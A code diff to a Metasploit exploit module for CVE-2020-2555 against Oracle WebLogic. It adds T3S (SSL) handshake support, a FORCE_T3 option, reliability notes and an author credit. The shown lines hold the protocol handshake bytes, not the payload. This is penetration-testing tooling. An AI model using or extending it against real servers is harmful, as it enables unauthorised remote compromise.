@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'Jang', # Vuln Discovery
           'Y4er', # PoC
-          'Shelby Pace' # Metasploit Module
+          'Shelby Pace', # Metasploit Module
+          'Steve Embling' # T3S support
         ],
         'References' => [
           [ 'CVE', '2020-2555' ],
@@ -58,11 +59,22 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DisclosureDate' => '2020-01-15',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
       )
     )
 
-    register_options([ Opt::RPORT(7001) ])
+    register_options([
+      Opt::RPORT(7001),
+    ])
+
+    register_advanced_options([
+      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
+    ])
   end
 
   def check
@@ -111,7 +123,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # t3 12.2.1\nAS:255
     # \nHL:19\nMS:100000
     # 00\n\n
-    shake = '74332031322e322e310a41533a323535'
+    if !datastore['SSL'] || datastore['FORCE_T3']
+      shake = '7433'
+    else
+      shake = '743373'
+    end
+    shake << '2031322e322e310a41533a323535'
     shake << '0a484c3a31390a4d533a313030303030'
     shake << '30300a0a'
 
